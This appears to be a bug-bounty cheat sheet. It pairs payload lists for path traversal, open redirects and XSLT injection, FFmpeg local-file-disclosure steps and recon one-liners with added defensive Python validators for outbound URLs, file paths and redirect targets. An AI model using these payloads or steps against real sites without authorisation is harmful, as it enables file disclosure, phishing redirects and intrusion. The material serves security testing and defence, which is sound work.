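An outbound-URL check that survives the bypasses listed in this section, as an added example (not code from the page). The IPv4 literal parser follows inet_aton semantics, which is what libcurl and most HTTP clients apply, so `0177.1`, `0x7f.1`, `127.000.000.1` and a bare decimal integer all canonicalise to the address the client would actually connect to; IPv6 literals and IPv4-mapped addresses go through `ipaddress`; the scheme allow-list disposes of the exotic handlers; and hostnames are resolved through a caller-supplied resolver so the wildcard-DNS case can be tested offline (the default resolver uses `socket.getaddrinfo`). The hostnames in the usage example are hypothetical.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# gopher://, dict://, file://, php://, jar://, tftp:// are all refused by the allow-list.
ALLOWED_SCHEMES = {"http", "https"}


def _octet(part):
    """One inet_aton component: 0x.. is hex, a leading 0 means octal, else decimal."""
    if part[:2].lower() == "0x":
        return int(part[2:] or "0", 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def inet_aton_style(host):
    """IPv4Address for a literal in any form inet_aton accepts, else None.
    With fewer than four parts the last one fills the remaining bytes, which is
    why 0177.1, 0x7f.1 and 2130706433 are all 127.0.0.1."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        vals = [_octet(p) for p in parts]
    except ValueError:
        return None
    tail_bits = 8 * (5 - len(parts))
    if any(v > 255 for v in vals[:-1]) or vals[-1] >= 1 << tail_bits:
        return None
    n = 0
    for v in vals[:-1]:
        n = (n << 8) | v
    return ipaddress.IPv4Address((n << tail_bits) | vals[-1])


def literal_ip(host):
    """Parse host as an IPv6 or inet_aton-style IPv4 literal; None if it is a name."""
    try:
        v6 = ipaddress.IPv6Address(host)
        return v6.ipv4_mapped or v6          # ::ffff:127.0.0.1 is really 127.0.0.1
    except ValueError:
        return inet_aton_style(host)


def is_forbidden(ip):
    """Loopback, RFC1918, link-local (169.254.169.254!), unspecified, reserved, multicast."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_unspecified or ip.is_reserved or ip.is_multicast)


def default_resolver(host):
    return [ai[4][0] for ai in socket.getaddrinfo(host, None)]


def is_safe_target(url, resolver=default_resolver):
    """Decide whether the server may fetch `url` on a user's behalf.

    Every address the name resolves to must be public.  The caller must then
    connect to the address that was checked rather than resolving again,
    otherwise DNS rebinding undoes the check."""
    u = urlsplit(url)
    if u.scheme not in ALLOWED_SCHEMES or not u.hostname or u.username is not None:
        return False
    ip = literal_ip(u.hostname)
    addrs = [ip] if ip is not None else [literal_ip(a) for a in resolver(u.hostname)]
    if not addrs or any(a is None for a in addrs):
        return False
    return not any(is_forbidden(a) for a in addrs)


if __name__ == "__main__":
    fake_dns = {"10.0.0.1.xip.io": ["10.0.0.1"], "www.example.com": ["93.184.216.34"]}
    for url in ["http://0177.1/", "http://[::]", "http://169.254.169.254/latest/meta-data/",
                "http://10.0.0.1.xip.io/", "gopher://www.example.com/", "https://www.example.com/"]:
        print(f"{is_safe_target(url, lambda h: fake_dns.get(h, []))!s:5} {url}")
```

The decimal form `https://520968996` resolves to 31.13.91.36, a public address, so it passes; the point of parsing it is that a blacklist built on the string "127.0.0.1" would never have seen the loopback forms at all.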

LFI

Filter Bypass

../\
..\/
/..
\/..
/%5c..
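Why the separator tricks above work, and the check that is not fooled by them, as an added example (not code from the page). A blacklist that only strips `../` is bypassed by `..\/`, `/%5c..` and friends; resolving the decoded path against the base directory and testing containment on the resolved string is not. The base directory is hypothetical and no files are read.

```python
import posixpath
from urllib.parse import unquote

BASE = "/var/www/app/uploads"   # hypothetical document root for the example


def naive_filter(user_path):
    """The kind of blacklist the separator tricks above are written against."""
    return user_path.replace("../", "")


def resolve_under_base(user_path, base=BASE):
    """Canonical absolute path for `user_path`, or None if it escapes `base`.

    Decodes until the string stops changing (so %5c, %255c and %2e%2e all
    collapse), rejects NUL, folds backslashes to slashes, treats the input as
    relative to base even if it starts with '/', normalises '..' away and
    finally checks containment on the resolved string, not on the raw input.
    """
    p = user_path
    for _ in range(3):
        decoded = unquote(p)
        if decoded == p:
            break
        p = decoded
    if "\x00" in p:                       # null-byte truncation trick
        return None
    p = p.replace("\\", "/").lstrip("/")
    full = posixpath.normpath(posixpath.join(base, p))
    if full != base and not full.startswith(base + "/"):
        return None
    return full


if __name__ == "__main__":
    for p in ["avatars/me.png", "../\\", "..\\/", "/..", "\\/..", "/%5c..",
              "..\\/..\\/..\\/etc/passwd", "%252e%252e%252fetc/passwd"]:
        print(f"{p!r:32} naive={naive_filter(p)!r:30} resolved={resolve_under_base(p)}")
```

Note that the naive filter passes `..\/..\/..\/etc/passwd` through untouched because the substring `../` never occurs in it; a server that later treats `\` as a separator reads /etc/passwd.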

FFmpeg Local File Disclosure

This script by @neex can be used to disclose local files on FFmpeg hosts which parse externally-referencing HLS playlists.

Steps to reproduce

  1. Please download the script from @neex to your “attacker” instance
  2. Execute the script with your desired parameters: python3 gen_xbin_avi.py file:///etc/hostname bugbounty.avi
  3. Upload the generated AVI file to your target site (e.g. within a ‘video upload page’)
  4. The target may process the malicious HLS inclusion with FFmpeg on the server-side.
  5. Play the uploaded AVI via the target site. If successful, your desired file will be disclosed within the video.

Alternative scripts exist which may generate different HLS formats or lead to the desired file being disclosed in a different manner.


Open Redirect

/%09/google.com
/%5cgoogle.com
//www.google.com/%2f%2e%2e
//www.google.com/%2e%2e
//google.com/
//google.com/%2f..
//\google.com
/\victim.com:80%40google.com

Possible open redirect parameters

?url=http://{target}
?url=https://{target}
?next=http://{target}
?next=https://{target}
?url=//{target}
?url=$2f%2f{target}
?next=//{target}
?next=$2f%2f{target}
/redirect/{target}
/cgi-bin/redirect.cgi?{target}
/out/{target}
/out?{target}
/out?/{target}
/out?//{target}
/out?/\{target}
/out?///{target}
?view={target}
?view=/{target}
?view=//{target}
?view=/\{target}
?view=///{target}
/login?to={target}
/login?to=/{target}
/login?to=//{target}
/login?to=/\{target}
/login?to=///{target}

Open Redirect Payloads by @cujanovic

https://github.com/cujanovic/Open-Redirect-Payloads

Open Redirect Parameters by @fuzzdb-project

https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/redirect/redirect-urls-template.txt
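A redirect-target check tested against the payloads above, as an added example (not code from the page or from either payload repository). The safe rule is to accept only a path relative to the current site and to decide that after browser-style normalisation, because `/\evil`, `//evil`, `/%09/evil` and `/\victim:80@evil` all begin with `/` and all leave the site in at least one browser. `SITE` is a hypothetical host.

```python
from urllib.parse import urlsplit, urljoin, unquote

SITE = "https://victim.example"   # hypothetical site the redirect must stay on


def is_local_redirect(target, site=SITE):
    """True only if `target` is a path on `site` after browser-style normalisation.

    Decodes until stable, drops TAB/LF/CR (browsers ignore them inside URLs,
    so "/%09/evil" becomes "//evil") and folds backslashes to slashes
    (browsers treat "/\\evil" as "//evil").  The result must be a single-slash
    relative path, and resolving it against the site must not change the
    scheme or authority.
    """
    t = target
    for _ in range(3):
        d = unquote(t)
        if d == t:
            break
        t = d
    t = "".join(ch for ch in t if ch not in "\t\r\n").replace("\\", "/")
    if not t.startswith("/") or t.startswith("//"):
        return False
    base, final = urlsplit(site), urlsplit(urljoin(site, t))
    return (final.scheme, final.netloc) == (base.scheme, base.netloc)


def safe_redirect(target, site=SITE, fallback="/"):
    """URL to put in the Location header: the resolved target or the fallback."""
    if is_local_redirect(target, site):
        return urljoin(site, target)
    return urljoin(site, fallback)


if __name__ == "__main__":
    for p in ["/account/settings", "/%09/google.com", "/%5cgoogle.com",
              "//www.google.com/%2f%2e%2e", "//\\google.com",
              "/\\victim.example:80%40google.com", "https://google.com/"]:
        print(f"{is_local_redirect(p)!s:5} {p!r:40} -> {safe_redirect(p)}")
```

A `next=` value that fails the check is replaced by the fallback rather than rejected with an error, so a user following a tampered login link still lands somewhere sensible on the site.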

XSLT Injection

Backend infos

<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body>
<xsl:text>xsl:vendor = </xsl:text><xsl:value-of select="system-property('xsl:vendor')"/><br/>
<xsl:text>xsl:version = </xsl:text><xsl:value-of select="system-property('xsl:version')"/><br/>
</body>
</html>

Injecting in PHP (only works when the application has called registerPHPFunctions() on its XSLTProcessor)

<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body>
<xsl:value-of select="php:function('phpinfo')"/>
</body>
</html>

Reconnaissance

Certspotter

curl https://certspotter.com/api/v0/certs\?domain\=example.com | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | uniq
curl https://certspotter.com/api/v0/certs\?domain\=example.com | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | uniq | dig +short -f - | uniq | nmap -T5 -Pn -sS -iL - -p 80,443,21,22,8080,8081,8443 --open -n -oG -

(nmap reads targets from stdin with -iL -; -sS needs root; uniq only drops adjacent duplicates, so sort the list first if it is not already grouped.)

Sublist3r One-liner

This runs Sublist3r on a list of domains and outputs the results in separate files.

. <(cat domains | xargs -n1 -i{} python sublist3r.py -d {} -o {}.txt)

Apktool to LinkFinder

apktool d app.apk; cd app;mkdir collection; find . -name \*.smali -exec sh -c "cp {} collection/\$(head /dev/urandom | md5 | cut -d' ' -f1).smali" \;; linkfinder -i 'collection/*.smali' -o cli

(md5 is the macOS command; on Linux use md5sum.)

Aquatone One-liner

$ echo "aquatone-discover -d \$1 && aquatone-scan -d \$1 --ports huge && aquatone-takeover -d \$1 && aquatone-gather -d \$1" >> aqua.sh && chmod +x aqua.sh
$ ./aqua.sh domain.com

relative-url-extractor

$ ruby extract.rb demo-file.js
$ ruby extract.rb https://hackerone.com/some-file.js
$ ruby extract.rb '|cat demo-file.js' -c